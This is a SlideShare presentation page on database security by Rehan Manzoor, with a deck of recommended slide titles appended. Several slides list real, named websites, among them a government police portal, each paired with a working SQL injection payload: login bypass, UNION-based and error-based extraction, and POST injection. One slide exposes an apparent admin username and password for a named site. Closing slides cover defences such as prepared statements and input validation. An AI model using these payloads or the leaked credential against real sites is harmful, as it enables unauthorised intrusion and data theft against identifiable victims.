SlideShare una empresa de Scribd logo

Database and Database Security..

Descargar como PPTX, PDF
Rehan Manzoor
Rehan Manzoor

Database and Database Security..

Tecnología
1 de 32
DATABASE & DATABASE SECURITY BY REHAN MANZOOR
What actually is a database  Code and Filing concept +
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct Queries)
Custom defined functions
Stored Procedures
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground
Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service
Top 10 vuln by OWASP
Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
Recent Bidding in Underground
Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders
Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners
Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements
More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker
Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword
Live Hack Of A Website  http://aquaservices.co.in/
Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.

Recomendados

Database security and privacy
Database security and privacyDatabase security and privacy
Database security and privacyMd. Ahasan Hasib
 
Database Security
Database SecurityDatabase Security
Database Securityalraee
 
DBMS SECURITY
DBMS SECURITYDBMS SECURITY
DBMS SECURITYWasim Raza
 
Database security
Database securityDatabase security
Database securitykeerthusandeepreddy
 
Database security
Database securityDatabase security
Database securityPrabhat gangwar
 
Database Security
Database SecurityDatabase Security
Database SecurityShingalaKrupa
 
Database security
Database securityDatabase security
Database securityArpana shree
 
Distributed database security with discretionary access control
Distributed database security with discretionary access controlDistributed database security with discretionary access control
Distributed database security with discretionary access controlJyotishkar Dey
 

Recomendados

Database security and privacy
Database security and privacyDatabase security and privacy
Database security and privacyMd. Ahasan Hasib
 
Database Security
Database SecurityDatabase Security
Database Securityalraee
 
DBMS SECURITY
DBMS SECURITYDBMS SECURITY
DBMS SECURITYWasim Raza
 
Database security
Database securityDatabase security
Database securitykeerthusandeepreddy
 
Database security
Database securityDatabase security
Database securityPrabhat gangwar
 
Database Security
Database SecurityDatabase Security
Database SecurityShingalaKrupa
 
Database security
Database securityDatabase security
Database securityArpana shree
 
Distributed database security with discretionary access control
Distributed database security with discretionary access controlDistributed database security with discretionary access control
Distributed database security with discretionary access controlJyotishkar Dey
 
Security and Integrity of Data
Security and Integrity of DataSecurity and Integrity of Data
Security and Integrity of DataAdeel Riaz
 
01 database security ent-db
01 database security ent-db01 database security ent-db
01 database security ent-dbuncleRhyme
 
Database Security And Authentication
Database Security And AuthenticationDatabase Security And Authentication
Database Security And AuthenticationSudeb Das
 
Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Prosanta Ghosh
 
DB security
DB security DB security
DB securityERSHUBHAM TIWARI
 
security and privacy in dbms and in sql database
security and privacy in dbms and in sql databasesecurity and privacy in dbms and in sql database
security and privacy in dbms and in sql databasegourav kottawar
 
Security of the database
Security of the databaseSecurity of the database
Security of the databasePratik Tamgadge
 
Database security
Database securityDatabase security
Database securityBirju Tank
 
Data base security
Data base securityData base security
Data base securitySara Nazir
 
Database security
Database securityDatabase security
Database securityCAS
 
Database modeling and security
Database modeling and securityDatabase modeling and security
Database modeling and securityNeeharika Nidadavolu
 
Chapter 5 database security
Chapter 5 database securityChapter 5 database security
Chapter 5 database securitySyaiful Ahdan
 
Data base security & integrity
Data base security & integrityData base security & integrity
Data base security & integrityPooja Dixit
 
Database security and security in networks
Database security and security in networksDatabase security and security in networks
Database security and security in networksG Prachi
 
Database security
Database securityDatabase security
Database securitySoftware Engineering
 
Database security issues
Database security issuesDatabase security issues
Database security issuesn|u - The Open Security Community
 
Lesson10 Database security
Lesson10 Database security Lesson10 Database security
Lesson10 Database security Muhammad Sikandar Mustafa
 
Security and Integrity
Security and IntegritySecurity and Integrity
Security and Integritylubna19
 
Database Security
Database SecurityDatabase Security
Database SecurityFerdous Pathan
 
Database security
Database securityDatabase security
Database securityMurchana Borah
 
Ch 12 O O D B Dvlpt
Ch 12 O O D B DvlptCh 12 O O D B Dvlpt
Ch 12 O O D B Dvlptguest8fdbdd
 
Database Life Cycle
Database Life CycleDatabase Life Cycle
Database Life CycleHarshendu Desai
 

Más contenido relacionado

La actualidad más candente

Security and Integrity of Data
Security and Integrity of DataSecurity and Integrity of Data
Security and Integrity of DataAdeel Riaz
 
01 database security ent-db
01 database security ent-db01 database security ent-db
01 database security ent-dbuncleRhyme
 
Database Security And Authentication
Database Security And AuthenticationDatabase Security And Authentication
Database Security And AuthenticationSudeb Das
 
Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Prosanta Ghosh
 
security and privacy in dbms and in sql database
security and privacy in dbms and in sql databasesecurity and privacy in dbms and in sql database
security and privacy in dbms and in sql databasegourav kottawar
 
Security of the database
Security of the databaseSecurity of the database
Security of the databasePratik Tamgadge
 
Database security
Database securityDatabase security
Database securityBirju Tank
 
Data base security
Data base securityData base security
Data base securitySara Nazir
 
Database security
Database securityDatabase security
Database securityCAS
 
Chapter 5 database security
Chapter 5 database securityChapter 5 database security
Chapter 5 database securitySyaiful Ahdan
 
Data base security & integrity
Data base security & integrityData base security & integrity
Data base security & integrityPooja Dixit
 
Database security and security in networks
Database security and security in networksDatabase security and security in networks
Database security and security in networksG Prachi
 
Security and Integrity
Security and IntegritySecurity and Integrity
Security and Integritylubna19
 

La actualidad más candente (20)

Security and Integrity of Data
Security and Integrity of DataSecurity and Integrity of Data
Security and Integrity of Data
 
01 database security ent-db
01 database security ent-db01 database security ent-db
01 database security ent-db
 
Database Security And Authentication
Database Security And AuthenticationDatabase Security And Authentication
Database Security And Authentication
 
Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013
 
DB security
DB security DB security
DB security
 
security and privacy in dbms and in sql database
security and privacy in dbms and in sql databasesecurity and privacy in dbms and in sql database
security and privacy in dbms and in sql database
 
Security of the database
Security of the databaseSecurity of the database
Security of the database
 
Database security
Database securityDatabase security
Database security
 
Data base security
Data base securityData base security
Data base security
 
Database security
Database securityDatabase security
Database security
 
Database modeling and security
Database modeling and securityDatabase modeling and security
Database modeling and security
 
Chapter 5 database security
Chapter 5 database securityChapter 5 database security
Chapter 5 database security
 
Data base security & integrity
Data base security & integrityData base security & integrity
Data base security & integrity
 
Database security and security in networks
Database security and security in networksDatabase security and security in networks
Database security and security in networks
 
Database security
Database securityDatabase security
Database security
 
Database security issues
Database security issuesDatabase security issues
Database security issues
 
Lesson10 Database security
Lesson10 Database security Lesson10 Database security
Lesson10 Database security
 
Security and Integrity
Security and IntegritySecurity and Integrity
Security and Integrity
 
Database Security
Database SecurityDatabase Security
Database Security
 
Database security
Database securityDatabase security
Database security
 

Destacado

Ch 12 O O D B Dvlpt
Ch 12 O O D B DvlptCh 12 O O D B Dvlpt
Ch 12 O O D B Dvlptguest8fdbdd
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Securityamiable_indian
 
CBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL PresentationCBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL PresentationGuru Ji
 
Data base management system
Data base management systemData base management system
Data base management systemNavneet Jingar
 
Database Design Slide 1
Database Design Slide 1Database Design Slide 1
Database Design Slide 1ahfiki
 
Database Management Systems (DBMS)
Database Management Systems (DBMS)Database Management Systems (DBMS)
Database Management Systems (DBMS)Dimara Hakim
 
Database management system
Database management systemDatabase management system
Database management systemRizwanHafeez
 
My Top 10 slides on presentations
My Top 10 slides on presentationsMy Top 10 slides on presentations
My Top 10 slides on presentationsAlexei Kapterev
 
Database administrator
Database administratorDatabase administrator
Database administratorTech_MX
 

Destacado (20)

Ch 12 O O D B Dvlpt
Ch 12 O O D B DvlptCh 12 O O D B Dvlpt
Ch 12 O O D B Dvlpt
 
Database Life Cycle
Database Life CycleDatabase Life Cycle
Database Life Cycle
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Security
 
Database management system basic, database, database management, learn databa...
Database management system basic, database, database management, learn databa...Database management system basic, database, database management, learn databa...
Database management system basic, database, database management, learn databa...
 
MySQL
MySQLMySQL
MySQL
 
Introduction to Mysql
Introduction to MysqlIntroduction to Mysql
Introduction to Mysql
 
CBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL PresentationCBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL Presentation
 
MySql slides (ppt)
MySql slides (ppt)MySql slides (ppt)
MySql slides (ppt)
 
Data base management system
Data base management systemData base management system
Data base management system
 
Database Design Slide 1
Database Design Slide 1Database Design Slide 1
Database Design Slide 1
 
Dbms
DbmsDbms
Dbms
 
Database Management Systems (DBMS)
Database Management Systems (DBMS)Database Management Systems (DBMS)
Database Management Systems (DBMS)
 
Database management system
Database management systemDatabase management system
Database management system
 
Data Base Management System
Data Base Management SystemData Base Management System
Data Base Management System
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
 
Cloud History 101
Cloud History 101Cloud History 101
Cloud History 101
 
My Top 10 slides on presentations
My Top 10 slides on presentationsMy Top 10 slides on presentations
My Top 10 slides on presentations
 
Database administrator
Database administratorDatabase administrator
Database administrator
 
Database Development Process
Database Development ProcessDatabase Development Process
Database Development Process
 
Dbms slides
Dbms slidesDbms slides
Dbms slides
 

Similar a Database and Database Security..

Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Data base security and injection
Data base security and injectionData base security and injection
Data base security and injectionA. Shamel
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmIOSR Journals
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Keeping Private Data Private
Keeping Private Data PrivateKeeping Private Data Private
Keeping Private Data PrivateDobler Consulting
 
8 sql injection
8 sql injection8 sql injection
8 sql injectiondrewz lin
 
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...Rana sing
 
Final review ppt
Final review pptFinal review ppt
Final review pptRana sing
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
Hacking databases
Hacking databasesHacking databases
Hacking databasessunil kumar
 

Similar a Database and Database Security.. (20)

Sql injection
Sql injection Sql injection
Sql injection
 
Data base security and injection
Data base security and injectionData base security and injection
Data base security and injection
 
E017131924
E017131924E017131924
E017131924
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive Algorithm
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Keeping Private Data Private
Keeping Private Data PrivateKeeping Private Data Private
Keeping Private Data Private
 
8 sql injection
8 sql injection8 sql injection
8 sql injection
 
Securing Applications
Securing ApplicationsSecuring Applications
Securing Applications
 
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
 
Final review ppt
Final review pptFinal review ppt
Final review ppt
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Web application security
Web application securityWeb application security
Web application security
 
Hacking databases
Hacking databasesHacking databases
Hacking databases
 

Último

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 

Último (20)

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 

Database and Database Security..

  • 1.
  • 3. What actually is a database  Code and Filing concept +
  • 7. How we Interact (Direct Queries)
  • 15. How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
  • 16. Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground
  • 17. Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service
  • 18. Top 10 vuln by OWASP
  • 19. Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
  • 20. Recent Bidding in Underground
  • 21. Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
  • 22. Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  • 23. Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  • 24. Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
  • 25. POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
  • 26. Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders
  • 27. Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners
  • 28. Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements
  • 29. More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker
  • 30. Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword
  • 31. Live Hack Of A Website  http://aquaservices.co.in/
  • 32. Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.